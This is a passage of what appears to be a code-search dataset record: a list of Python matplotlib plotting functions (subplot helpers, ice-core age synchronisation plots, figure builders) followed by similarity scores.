mpl.plot(self.site1.fct_airage_init(self.airairhorizons_depth1),\n self.site2.fct_airage_init(self.airairhorizons_depth2),\n color=pccfg.color_init,\n linestyle='',\n marker='o', markersize=2, label=\"Initial\")\n mpl.plot(self.site1.fct_airage_model(self.airairhorizons_depth1),\n 
self.site2.fct_airage_model(self.airairhorizons_depth2),\n color=pccfg.color_mod,\n linestyle='', marker='o', markersize=2,\n label=\"Prior\")\n mpl.errorbar(self.site1.fct_airage(self.airairhorizons_depth1),\n self.site2.fct_airage(self.airairhorizons_depth2),\n color=pccfg.color_opt,\n xerr=np.zeros_like(self.airairhorizons_sigma),\n linestyle='', marker='o', markersize=2,\n label=\"Posterior\")\n xstart = self.site1.fct_airage(self.airairhorizons_depth1)-\\\n self.airairhorizons_sigma/2\n ystart = self.site2.fct_airage(self.airairhorizons_depth2)+\\\n self.airairhorizons_sigma/2\n for i in range(np.size(self.airairhorizons_depth1)):\n mpl.arrow(xstart[i], ystart[i], self.airairhorizons_sigma[i],\n -self.airairhorizons_sigma[i], color=pccfg.color_opt,\n width=0.0, head_length=0.0, head_width=0.0)\n x_low, x_up, y_low, y_up = mpl.axis()\n# x_low = self.site1.age_top\n# y_low = self.site2.age_top\n# mpl.axis((x_low, x_up, y_low, y_up))\n rangefig = np.array([min(x_low, y_low), max(x_up, y_up)])\n mpl.plot(rangefig, rangefig, color=pccfg.color_obs, label='perfect agreement',\n zorder=0)\n mpl.legend(loc=\"best\")\n ax.set_aspect('equal')\n printed_page = PdfPages(pccfg.datadir+self.label+'/air_air_synchro.pdf')\n printed_page.savefig(fig)\n printed_page.close()\n if not pccfg.show_figures:\n mpl.close()\n\n if self.site2.archive == 'icecore':\n if np.size(self.iceairhorizons_depth1)>0:\n fig, ax = mpl.subplots()\n if self.site1.archive == 'icecore':\n mpl.xlabel(self.site1.label+' ice age (yr b1950)')\n else:\n mpl.xlabel(self.site1.label+' age (yr b1950)')\n mpl.ylabel(self.site2.label+' air age (yr b1950)')\n if np.size(self.iceairhorizons_depth1) > 0:\n if pccfg.show_initial:\n mpl.plot(self.site1.fct_age_init(self.iceairhorizons_depth1),\n self.site2.fct_airage_init(self.iceairhorizons_depth2),\n color=pccfg.color_init,\n linestyle='',\n marker='o', markersize=2, label=\"Initial\")\n mpl.plot(self.site1.fct_age_model(self.iceairhorizons_depth1),\n self.site2.fct_airage_model(self.iceairhorizons_depth2),\n color=pccfg.color_mod,\n linestyle='', marker='o', markersize=2,\n label=\"Prior\")\n mpl.errorbar(self.site1.fct_age(self.iceairhorizons_depth1),\n self.site2.fct_airage(self.iceairhorizons_depth2),\n color=pccfg.color_opt,\n xerr=np.zeros_like(self.iceairhorizons_sigma),\n linestyle='', marker='o', markersize=2,\n label=\"Posterior\")\n xstart = self.site1.fct_age(self.iceairhorizons_depth1)-\\\n self.iceairhorizons_sigma/2\n ystart = self.site2.fct_airage(self.iceairhorizons_depth2)+\\\n self.iceairhorizons_sigma/2\n for i in range(np.size(self.iceairhorizons_depth1)):\n mpl.arrow(xstart[i], ystart[i], self.iceairhorizons_sigma[i],\n -self.iceairhorizons_sigma[i], color=pccfg.color_opt,\n width=0.0, head_length=0.0, head_width=0.0) \n x_low, x_up, y_low, y_up = mpl.axis()\n# x_low = self.site1.age_top\n# y_low = self.site2.age_top\n# mpl.axis((x_low, x_up, y_low, y_up))\n rangefig = np.array([min(x_low, y_low), max(x_up, y_up)])\n mpl.plot(rangefig, rangefig, color=pccfg.color_obs, label='perfect agreement',\n zorder=0)\n mpl.legend(loc=\"best\")\n ax.set_aspect('equal')\n if self.site1.archive == 'icecore':\n printed_page = PdfPages(pccfg.datadir+self.label+'/ice_air_synchro.pdf')\n else:\n printed_page = PdfPages(pccfg.datadir+self.label+'/air_synchro.pdf')\n printed_page.savefig(fig)\n printed_page.close()\n if not pccfg.show_figures:\n mpl.close()\n\n if self.site1.archive == 'icecore':\n if np.size(self.airicehorizons_depth1)>0:\n fig, ax = mpl.subplots()\n 
mpl.xlabel(self.site1.label+' air age (yr b1950)')\n if self.site2.archive == 'icecore':\n mpl.ylabel(self.site2.label+' ice age (yr b1950)')\n else:\n mpl.ylabel(self.site2.label+' age (yr b1950)')\n if np.size(self.airicehorizons_depth1) > 0:\n if pccfg.show_initial:\n mpl.plot(self.site1.fct_airage_init(self.airicehorizons_depth1),\n self.site2.fct_age_init(self.airicehorizons_depth2),\n color=pccfg.color_init,\n linestyle='', marker='o', markersize=2, label=\"Initial\")\n mpl.plot(self.site1.fct_airage_model(self.airicehorizons_depth1),\n self.site2.fct_age_model(self.airicehorizons_depth2),\n color=pccfg.color_mod,\n linestyle='', marker='o', markersize=2,\n label=\"Prior\")\n mpl.errorbar(self.site1.fct_airage(self.airicehorizons_depth1),\n self.site2.fct_age(self.airicehorizons_depth2),\n color=pccfg.color_opt,\n xerr=np.zeros_like(self.airicehorizons_sigma),\n linestyle='', marker='o', markersize=2,\n label=\"Posterior\")\n xstart = self.site1.fct_airage(self.airicehorizons_depth1)-\\\n self.airicehorizons_sigma/2\n ystart = self.site2.fct_age(self.airicehorizons_depth2)+\\\n self.airicehorizons_sigma/2\n for i in range(np.size(self.airicehorizons_depth1)):\n mpl.arrow(xstart[i], ystart[i], self.airicehorizons_sigma[i],\n -self.airicehorizons_sigma[i], color=pccfg.color_opt,\n width=0.0, head_length=0.0, head_width=0.0)\n x_low, x_up, y_low, y_up = mpl.axis()\n# x_low = self.site1.age_top\n# y_low = self.site2.age_top\n# mpl.axis((x_low, x_up, y_low, y_up))\n rangefig = np.array([min(x_low, y_low), max(x_up, y_up)])\n mpl.plot(rangefig, rangefig, color=pccfg.color_obs, label='perfect agreement')\n mpl.legend(loc=\"best\")\n ax.set_aspect('equal')\n if self.site2.archive == 'icecore':\n printed_page = PdfPages(pccfg.datadir+self.label+'/air_ice_synchro.pdf')\n else:\n printed_page = PdfPages(pccfg.datadir+self.label+'/air_synchro.pdf')\n printed_page.savefig(fig)\n printed_page.close()\n if not pccfg.show_figures:\n mpl.close()", "def create_fig_ax(ax, **kwargs):\n if ax is None:\n fig, ax = plt.subplots(**kwargs)\n else:\n fig = ax.get_figure()\n return fig, ax", "def make_frame(nbinx, nbiny, title='',d_beg='',d_end='',ylow='',yup='',maxticks='',dates = False):\n\n aax = (1,) * nbinx\n ax = (aax,) * nbiny\n\n f, (ax) = plt.subplots(nbinx,nbiny, sharex=True, sharey=True)\n f.suptitle(title)\n \n f.subplots_adjust(hspace=0.05)\n f.subplots_adjust(wspace=0.05)\n f.subplots_adjust(top=0.95)\n f.subplots_adjust(right=0.95)\n f.subplots_adjust(left=0.05) \n if dates:\n f.autofmt_xdate(bottom=0.1, rotation=90, ha='right') \n\n # --- customize x and y range and number of ticks\n\n if nbinx==1 and nbiny==1:\n ax = [[ax]] # cast ax into an array to make the operations consistent\n if d_beg != '' and d_end != '':\n for axx in ax:\n\n dlim = [d_beg,d_end]\n for axxx in axx:\n axxx.set_autoscalex_on(False)\n axxx.set_xlim(dlim)\n\n if ylow != '' and yup != '':\n print(' setting up y scale ',ylow,yup, title)\n for axx in ax:\n\n ylim = [ylow,yup]\n for axxx in axx:\n axxx.set_ylim(ylim) \n\n if maxticks != '':\n for axx in ax:\n for axxx in axx: \n axxx.xaxis.set_major_locator(plt.MaxNLocator(maxticks))\n \n #for a single frame ax is a scalar. put it back.. 
\n if nbinx==1 and nbiny==1:\n ax = ax[0][0] \n return f,(ax)", "def alty(self, **kwargs):\n if self._alty_child or self._alty_parent:\n raise RuntimeError('No more than *two* twin axes are allowed.')\n with self.figure._authorize_add_subplot():\n ax = self._make_twin_axes(sharex=self, projection='xy')\n ax.set_autoscalex_on(self.get_autoscalex_on())\n ax.grid(False)\n self._alty_child = ax\n ax._alty_parent = self\n self._alty_overrides()\n ax._alty_overrides()\n self.add_child_axes(ax) # to facilitate tight layout\n self.figure._axstack.remove(ax) # or gets drawn twice!\n ax.format(**_parse_alt('y', kwargs))\n return ax", "def _newax(ax=None):\n from matplotlib import pyplot as plt\n if ax is not None:\n return ax\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n return ax", "def plots(corpus_parts, corpus):\n \"\"\"\n given the data obtained by the function percentage_hapaxes(dv_corpus, tokenized_corpus),\n the graphic for the percentage of hapaxes per partition is plotted\n \"\"\"\n h_parts = hapaxes_parts(corpus_parts)\n part_size = [x for x in range(len(h_parts))]\n \n percent_h = percentage_hapaxes(corpus_parts, corpus)\n percent_length = [i for i in range(len(percent_h))] \n \n fig, (ax1, ax2) = plt.subplots(1, 2)\n plt.setp(ax1, xticks=np.arange(0, len(part_size), 1))\n plt.setp(ax2, xticks=np.arange(0, len(percent_length), 1))\n fig.suptitle('Number (left) and percentage (right) of hapaxes in each part')\n ax1.bar(part_size, h_parts)\n ax2.bar(percent_length, percent_h) \n return plt.show()", "def plot(self) -> List[matplotlib.figure.Figure]:\n figs = []\n\n title_prefix = self.trial_name + ' ' + self.segment_name + ' '\n # Figure 1, position in 3 subplots\n pos_fig_sub = self.plot_subplots(self.fig_num_start, title_prefix + 'Position (mm)', self.pos_raw,\n self.pos_smooth, self.pos_legend)\n figs.append(pos_fig_sub)\n\n # Figure 2, orientation in 3 subplots\n eul_fig_sub = self.plot_subplots(self.fig_num_start + 1, title_prefix + 'Euler Angles (deg)', self.eul_raw,\n self.eul_smooth, self.euler_legend)\n figs.append(eul_fig_sub)\n\n # Figure 3, velocity in 3 subplots\n vel_fig_sub = self.plot_subplots_vel(self.fig_num_start + 2, title_prefix + 'Velocity', 'Velocity (mm/s)',\n self.vel)\n figs.append(vel_fig_sub)\n\n # Figure 4, angular velocity in 3 subplots\n ang_vel_fig_sub = self.plot_subplots_vel(self.fig_num_start + 3, title_prefix + 'Angular Velocity',\n 'Angular Velocity (deg/s)', self.ang_vel)\n figs.append(ang_vel_fig_sub)\n\n # Figure 5, position in one axes\n pos_fig_one = self.plot_one_axes(self.fig_num_start + 4, title_prefix + 'Position', 'Position (mm)',\n self.pos_raw, self.pos_smooth, self.pos_legend)\n figs.append(pos_fig_one)\n\n # Figure 6, orientation in one axes\n eul_fig_one = self.plot_one_axes(self.fig_num_start + 5, title_prefix + 'Euler Angles', 'Angle (deg)',\n self.eul_raw, self.eul_smooth, self.euler_legend)\n figs.append(eul_fig_one)\n\n # Figure 7, velocity in one axes\n vel_fig_one = self.plot_one_axes_vel(self.fig_num_start + 6, title_prefix + 'Velocity', 'Velocity (mm/s)',\n self.vel, self.pos_legend)\n figs.append(vel_fig_one)\n\n # Figure 8, angular velocity in one axes\n ang_vel_fig_one = self.plot_one_axes_vel(self.fig_num_start + 7, title_prefix + 'Angular Velocity',\n 'Angular Velocity (deg/s)', self.ang_vel, self.pos_legend)\n figs.append(ang_vel_fig_one)\n\n return figs", "def figure7():\n\n plot_settings = {'y_limits': [-100, 30],\n 'x_limits': None,\n 'y_ticks': [-80, -60, -40, -20, 0, 20],\n 'locator_size': 10,\n 'y_label': 
'Voltage (mV)',\n 'x_ticks': [],\n 'scale_size': 50,\n 'x_label': \"\",\n 'scale_loc': 3,\n 'figure_name': 'figure_7',\n 'legend': None,\n 'legend_size': 8,\n 'y_on': True}\n\n marker = ['o', 's', '^']\n line_styles = ['-', 'dotted', '--']\n\n plt.figure(figsize=(5, 3), dpi=96)\n\n plt.subplot(2, 1, 1) # Generate subplot 1 (top)\n t, y = solver(250, i_bias_on=2, duration=260)\n plt.plot(t, y[:, 0], 'k-')\n alter_figure(plot_settings)\n\n plt.subplot(2, 1, 2) # Generate subplot 2 (bottom)\n for ix, i_bias_on in enumerate([2, 1.5, 1]):\n t, y = solver(250, i_bias_on=i_bias_on, duration=260)\n t_spike, f = spike_times(t, y[:, 0])\n plt.plot(t_spike[0:-1], f, c='k', linestyle=line_styles[ix], marker=marker[ix], fillstyle='none')\n\n plot_settings['y_limits'] = [20, 40]\n plot_settings['y_ticks'] = [20, 25, 30, 35, 40]\n plot_settings['locator_size'] = 2.5\n plot_settings['y_label'] = 'Frequency (Hz)'\n plot_settings['legend'] = ['2.0 nA', '1.5 nA', '1.0 nA']\n plot_settings['scale_size'] = 0\n plot_settings['legend_location'] = 4\n alter_figure(plot_settings, close=True)", "def createFigure(self):\n\n SMALL_SIZE = 14\n MEDIUM_SIZE = 18\n BIGGER_SIZE = 36\n\n plt.rc('font', size=SMALL_SIZE) # controls default text sizes\n plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\n plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=MEDIUM_SIZE) # fontsize of the tick labels\n plt.rc('ytick', labelsize=MEDIUM_SIZE) # fontsize of the tick labels\n plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\n plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title\n\n fig, axes = plt.subplots()\n fig.set_size_inches(10, 6, forward=True)\n serialNumber = self.spectrometer.getSerialNumber()\n model = self.spectrometer.model\n fig.canvas.manager.set_window_title('Spectrometer [serial # {0}, model {1}]'.format(serialNumber, model))\n axes.set_xlabel(\"Wavelength [nm]\")\n axes.set_ylabel(\"Intensity [arb.u]\")\n return fig, axes", "def subplot(\r\n self,\r\n data: bool = False,\r\n noise_map: bool = False,\r\n signal_to_noise_map: bool = False,\r\n model_data: bool = False,\r\n residual_map: bool = False,\r\n normalized_residual_map: bool = False,\r\n chi_squared_map: bool = False,\r\n auto_filename: str = \"subplot_fit\",\r\n ):\r\n self._subplot_custom_plot(\r\n data=data,\r\n noise_map=noise_map,\r\n signal_to_noise_map=signal_to_noise_map,\r\n model_image=model_data,\r\n residual_map=residual_map,\r\n normalized_residual_map=normalized_residual_map,\r\n chi_squared_map=chi_squared_map,\r\n auto_labels=AutoLabels(filename=auto_filename),\r\n )", "def change_axes_geometry_stack(fig, ax, naxes):\n for ii in range(len(ax)):\n geometry = (naxes, 1, ii + 1)\n if ax[ii].get_geometry() != geometry:\n ax[ii].change_geometry(*geometry)\n\n for ii in np.arange(len(ax), naxes):\n print('adding axis ', ii)\n fig.add_subplot(naxes, 1, ii + 1)\n\n ax = fig.axes\n return fig, ax", "def makeQuadSubplots(df_rad_obs, \n df_dir_obs, \n df_rad_sen, \n df_dir_sen, \n suptitle='Big title',\n eps=3, \n min_samples=50):\n fig, axs = plt.subplots(2, 2, \n figsize=(10,10)\n )\n\n fig.suptitle('Clustering Output', fontsize=20)\n\n populateSubPlot(df=df_rad_obs,\n eps=eps, \n min_samples=min_samples,\n fig=fig, \n axs=axs, \n row=0, \n col=0, title='Obsever Wards Radiant')\n\n\n populateSubPlot(df=df_dir_obs, \n eps=eps, \n min_samples=min_samples,\n fig=fig, \n axs=axs, \n row=0, \n col=1, title='Obsever Wards Dire')\n\n\n populateSubPlot(df=df_rad_sen, \n 
eps=eps, \n min_samples=min_samples,\n fig=fig, \n axs=axs, \n row=1, \n col=0, title='Sentry Wards Radiant')\n\n populateSubPlot(df=df_dir_sen, \n eps=eps, \n min_samples=min_samples,\n fig=fig, \n axs=axs, \n row=1, \n col=1, title='Sentry Wards Dire')\n \n \n return fig, axs", "def plot_subplots(x_list, y_list, z_list):\n # create a line chart with the average rating of the top movies per year\n # min rating = 0 and max = 10\n plot1 = plt.subplot(211)\n plt.plot(x_list, y_list, color = 'lightseagreen')\n plt.axis([START_YEAR, END_YEAR - 1, 0, 10])\n plt.title('Average IMDB Movie Rating per Year', fontsize=12)\n plt.ylabel('Average Rating')\n plt.grid(True)\n\n # make x ticklabels of plot1 invisible\n plt.setp(plot1.get_xticklabels(), visible=False)\n\n # adjust space between subplots\n plt.subplots_adjust(hspace=0.3)\n\n # create a line chart with the average runtime with shared x-axis\n plot2 = plt.subplot(212, sharex=plot1)\n plt.plot(x_list, z_list, color = 'lightseagreen')\n plt.title('Average IMDB Movie Runtime per Year', fontsize=12)\n plt.ylabel('Average Runtime (min)')\n plt.grid(True)\n\n # define axes, with all years (2008 till 2017) on the x-axis\n # min runtime = 0, max runtime = 180\n plt.axis([START_YEAR, END_YEAR - 1, 0, 180])\n plt.xticks(x_list)\n plt.xlabel('Year')\n\n # plot both the subplots\n plt.show()", "def _add_new_ax(self, name=None):\n if name in self.ax_names:\n return self.get_ax_by_name(name)\n\n self.ncols += 1\n for i, (ax, ax_name) in enumerate(zip(self.fig.axes, self.ax_names)):\n #print(f'Changing ax {ax_name} geom to: {(1,self.ncols,i+1)}')\n ax.change_geometry(1, self.ncols, i+1)\n\n new_ax = self.fig.add_subplot(1, self.ncols, self.ncols)\n self.ax.append(new_ax)\n self.ax_names.append(name)\n\n return new_ax", "def plot2axes(self, axes: plt.Axes, width: float | int = 1) -> None:\n for idx, line in enumerate(self.marker_lines):\n line.plot2axes(axes, width, color=self.bg_color[idx])", "def add_rotated_axis(f, extents=(-1, 1, 0, 1), sc_x=None, sc_y=None,\n rotation=45, position=(.5, .5, .1, .1),\n invisible_border=True):\n af = Affine2D()\n transform = af.scale(sc_x, sc_y).rotate_deg(rotation)\n helper = floating_axes.GridHelperCurveLinear(transform, extents)\n ax = floating_axes.FloatingSubplot(f, 111, grid_helper=helper)\n ax_aux = ax.get_aux_axes(transform)\n f.add_subplot(ax)\n ax.set_position(position)\n ax.invert_xaxis()\n\n if invisible_border is True:\n # Strip axis elements\n ax.patch.set(visible=False)\n for axis in ax.axis.values():\n axis.set_visible(False)\n\n return ax, ax_aux" ]
[ "0.75483835", "0.69776756", "0.6920952", "0.6792715", "0.6734505", "0.67272097", "0.6658397", "0.65871996", "0.6570815", "0.6514838", "0.64744306", "0.6344331", "0.6338495", "0.6338495", "0.6338495", "0.6302795", "0.6281416", "0.6270343", "0.6264229", "0.62637293", "0.6255154", "0.6236712", "0.62184274", "0.6186897", "0.61654055", "0.6143037", "0.61289173", "0.6124079", "0.60945094", "0.60613894", "0.605767", "0.6055342", "0.60486865", "0.6020366", "0.59955615", "0.5994914", "0.5979007", "0.59462047", "0.59213096", "0.5919712", "0.5917855", "0.5913373", "0.5895629", "0.5894967", "0.5881231", "0.588059", "0.587299", "0.5857417", "0.5850622", "0.5850527", "0.58291614", "0.581591", "0.580388", "0.5802825", "0.579698", "0.5787676", "0.5774288", "0.5760265", "0.5753451", "0.57340515", "0.5731099", "0.5730021", "0.5724319", "0.5720464", "0.5719268", "0.57179874", "0.5714657", "0.5709151", "0.5709151", "0.5700377", "0.56896114", "0.5666812", "0.5653488", "0.5632866", "0.5632866", "0.5632099", "0.5630578", "0.5619918", "0.5619918", "0.5619297", "0.56146", "0.5596572", "0.5580994", "0.55793136", "0.5578921", "0.5556231", "0.5549778", "0.5548228", "0.55460304", "0.5539533", "0.55346483", "0.5524323", "0.552046", "0.55181545", "0.55157137", "0.55113447", "0.5509778", "0.5508655", "0.55072725", "0.5505714" ]
0.6709672
6
Construct quadrilateral mesh arrays from two grids. Intended for use with e.g. plt.pcolor.
def quad_mesh(x, y, cut_x_edges=False, cut_y_edges=False):
    # Get 1d vertex vectors
    xvert = get_1d_vertices(x, cut_edges=cut_x_edges)
    yvert = get_1d_vertices(y, cut_edges=cut_y_edges)
    # Reshape as multidimensional vectors
    xvert = reshape_vector(xvert, dim=2, axis=1)
    yvert = reshape_vector(yvert, dim=2, axis=0)
    # Broadcast up to arrays
    xmesh = xvert * np.ones_like(yvert)
    ymesh = yvert * np.ones_like(xvert)
    return xmesh, ymesh
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def meshgrid(x,y):\n x = asarray(x)\n y = asarray(y)\n numRows, numCols = len(y), len(x) # yes, reversed\n x = x.reshape(1,numCols)\n X = x.repeat(numRows, axis=0)\n\n y = y.reshape(numRows,1)\n Y = y.repeat(numCols, axis=1)\n return X, Y", "def make_meshgrid(x, y, h=.02):\r\n x_min, x_max = x.min() - 1, x.max() + 1\r\n y_min, y_max = y.min() - 1, y.max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\r\n np.arange(y_min, y_max, h))\r\n return xx, yy", "def make_meshgrid(x, y,h=0.02):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h=.02):\r\n x_min, x_max = x.min() - 1, x.max() + 1\r\n y_min, y_max = y.min() - 1, y.max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min,x_max,h),np.arange(y_min,y_max,h))\r\n return xx, yy", "def make_meshgrid(x, y, h=.02):\r\n x_min, x_max = x.min() - 1, x.max() + 1\r\n y_min, y_max = y.min() - 1, y.max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min,x_max,h),np.arange(y_min,y_max,h))\r\n return xx, yy", "def make_meshgrid(x, y, h=.02):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h=.02):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h=.02):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h=.02):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h=0.02):\n space = 0.3\n x_min, x_max = x.min() - space, x.max() + space\n y_min, y_max = y.min() - space, y.max() + space\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h = 5):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def create_meshgrid(x, y, h=0.015):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def meshgrid(x, y, row_major=True):\n # type: (int, int, bool)->Tensor\n a = torch.arange(0, x)\n b = torch.arange(0, y)\n xx = a.repeat(y).view(-1, 1).float()\n yy = b.view(-1, 1).repeat(1, x).view(-1, 1).float()\n return torch.cat([xx, yy], 1) if row_major else torch.cat([yy, xx], 1)", "def make_meshgrid(x_min,x_max,y_min,y_max, h=.02):\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x_min,x_max,y_min,y_max, h=.02):\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def grid(h, w, dtype=np.float32):\n M = h * w\n x = np.linspace(0, 1, w, dtype=dtype)\n y = np.linspace(0, 1, h, dtype=dtype)\n xx, yy = np.meshgrid(x, y)\n z = np.empty((M, 2), dtype)\n z[:, 0] = xx.reshape(M)\n z[:, 1] = yy.reshape(M)\n return z", "def make_grid(self, nx, ny):\n nx_vec = 
np.arange(nx)\n ny_vec = np.arange(ny)\n yv, xv = np.meshgrid(ny_vec, nx_vec)\n grid = np.stack((yv, xv), axis=2)\n grid = grid.reshape(1, 1, ny, nx, 2)\n return grid", "def _create_meshgrid(self):\n x = np.linspace(self.limits[0], self.limits[1], self.resolution)\n y = np.linspace(self.limits[2], self.limits[3], self.resolution)\n X, Y = np.meshgrid(x, y)\n return X, Y", "def coordinate_pairs(lat_axis, lon_axis):\n \n lon_mesh, lat_mesh = numpy.meshgrid(lon_axis, lat_axis) # This is the correct order\n \n return lat_mesh.flatten(), lon_mesh.flatten()", "def meshgrid(b, convention='Driscoll-Healy'):\n return np.meshgrid(*linspace(b, convention))", "def ppcolormesh_from_meshgrid(ax: Axes, x: np.ndarray, y: np.ndarray,\n z: np.ndarray, **kw) -> AxesImage:\n cmap = kw.get('cmap', cm.viridis)\n\n x = x.astype(float)\n y = y.astype(float)\n z = z.astype(float)\n\n # first check if we need to fill some masked values in\n if np.ma.is_masked(x):\n x = x.filled(np.nan)\n if np.ma.is_masked(y):\n y = y.filled(np.nan)\n if np.ma.is_masked(z):\n z = z.filled(np.nan)\n\n # next: try some surgery, if possible\n if np.all(num.is_invalid(x)) or np.all(num.is_invalid(y)):\n return\n if np.any(np.isnan(x)) or np.any(np.isnan(y)):\n x, y = interp_meshgrid_2d(x, y)\n if np.any(num.is_invalid(x)) or np.any(num.is_invalid(y)):\n x, y, z = num.crop2d(x, y, z)\n\n # next, check if the resulting grids are even still plotable\n for g in x, y, z:\n if g.size == 0:\n return\n elif len(g.shape) < 2:\n return\n\n # special case: if we have a single line, a pcolor-type plot won't work.\n elif min(g.shape) < 2:\n im = ax.scatter(x, y, c=z)\n return im\n\n # and finally: the meshgrid we have describes coordinates, but for plotting\n # with pcolormesh we need vertices.\n try:\n x = centers2edges_2d(x)\n y = centers2edges_2d(y)\n except:\n return\n\n im = ax.pcolormesh(x, y, z, cmap=cmap, **kw)\n ax.set_xlim(x.min(), x.max())\n ax.set_ylim(y.min(), y.max())\n return im", "def _grid(m, dtype=np.float32):\n M = m**2\n x = np.linspace(0, 1, m, dtype=dtype)\n y = np.linspace(0, 1, m, dtype=dtype)\n xx, yy = np.meshgrid(x, y)\n z = np.empty((M, 2), dtype)\n z[:, 0] = xx.reshape(M)\n z[:, 1] = yy.reshape(M)\n return z", "def buildGrid(self, plot=False):\r\n\r\n print(\"Constructing grid\")\r\n # print(\"Grid dims\", self.ne, self.nn, self.nz)\r\n # print(\"Num points\", 2*(self.ne+1)*(self.nn+1)*3, len(self.coords))\r\n\r\n # number of edges\r\n self.ndx = self.ne + 1\r\n self.ndy = self.nn + 1\r\n self.ndz = self.nz + 1\r\n\r\n # extract the triplets\r\n self.points = {}\r\n self.points[\"e\"] = self.coords[0::3]\r\n self.points[\"n\"] = self.coords[1::3]\r\n self.points[\"z\"] = self.coords[2::3]\r\n\r\n print('points e')\r\n print(self.points[\"e\"])\r\n\r\n # Here are the coordinates\r\n self.X0 = np.reshape(self.points[\"e\"][0::2] , (self.ndx,self.ndy), order=\"F\")\r\n self.Y0 = np.reshape(self.points[\"n\"][0::2] , (self.ndx,self.ndy), order=\"F\")\r\n self.Z0 = np.reshape(self.points[\"z\"][0::2] , (self.ndx,self.ndy), order=\"F\")\r\n\r\n self.X1 = np.reshape(self.points[\"e\"][1::2] , (self.ndx,self.ndy), order=\"F\")\r\n self.Y1 = np.reshape(self.points[\"n\"][1::2] , (self.ndx,self.ndy), order=\"F\")\r\n self.Z1 = np.reshape(self.points[\"z\"][1::2] , (self.ndx,self.ndy), order=\"F\")\r\n #\r\n # # visualize\r\n # if plot:\r\n # print(\"plotting\")\r\n # fig = plt.figure()\r\n # ax = fig.add_subplot(111, projection='3d')\r\n # ax.plot_wireframe(f2m*self.X0, f2m*self.Y0, f2m*self.Z0, rstride=1, cstride=1)\r\n # 
ax.plot_wireframe(f2m*self.X1, f2m*self.Y1, f2m*self.Z1, rstride=1, cstride=1)\r\n # plt.show()\r", "def ndgrid(*args,**kwargs):\n kwargs['indexing'] = 'ij'\n return meshgrid(*args,**kwargs)", "def mesh_grid(self,width,height):\n # get\n \n x_linspace=tf.linspace(-self.cx_,1-self.cx_,width)\n y_linspace=tf.linspace(-self.cy_,1-self.cy_,height)\n \n# x_cord,y_cord=tf.meshgrid(x_linspace,y_linspace)\n y_cord,x_cord=tf.meshgrid(y_linspace,x_linspace)\n \n \n x_cord=tf.reshape(x_cord,[-1])\n y_cord=tf.reshape(y_cord,[-1])\n \n f_=tf.ones_like(x_cord)\n \n x_=tf.div(x_cord,self.cf)\n y_=tf.div(y_cord,self.cf)\n \n grid=tf.concat([x_,y_,f_],0)\n return grid", "def create_mesh_grid(val_loc, linspace, frame=None, method='cubic'):\n locations = val_loc[:,0:2]\n values = val_loc[:,2]\n if frame == None:\n frame = create_frame_for(locations)\n assert len(frame) == 2, \"Precondition violation\"\n assert len(frame[0]) == 2 and len(frame[1]) == 2, \"Preconditio violation\"\n assert frame[0][0] <= frame[0][1] and frame[1][0] <= frame[1][1], \"Precondition violation\"\n assert len(linspace) == 2, \"Precondition violatio\"\n assert linspace[0] > 0 and linspace[1] > 0, \"Precondition violation\"\n assert method in ['cubic','linear','nearest'], \"Precondition violaiton\"\n mesh_X, mesh_Y = np.meshgrid(\n np.linspace(frame[0][0],frame[0][1],linspace[0]),\n np.linspace(frame[1][0],frame[1][1],linspace[1]),\n indexing='xy'\n )\n mesh_Z = scipy.interpolate.griddata(\n locations, values, (mesh_X, mesh_Y), method=method, fill_value=0\n )\n return mesh_X, mesh_Y, mesh_Z", "def _setQuadrilaterals(self):\n\n # Make sure arrays are numpy arrays.\n self._lon = np.array(self._lon)\n self._lat = np.array(self._lat)\n self._depth = np.array(self._depth)\n\n # Find the nans, which tells is where the separate polygons/groups are\n group_ends = np.where(np.isnan(self._lon))[0]\n n_groups = len(group_ends)\n\n # Check that arrays are the same length\n if len(self._lon) != len(self._lat) != len(self._depth):\n raise IndexError(\n 'Length of input lon, lat, depth arrays must be equal')\n\n # Construct quads\n group_start = 0\n\n self._quadrilaterals = []\n self._group_index = []\n groupind = 0\n for i in 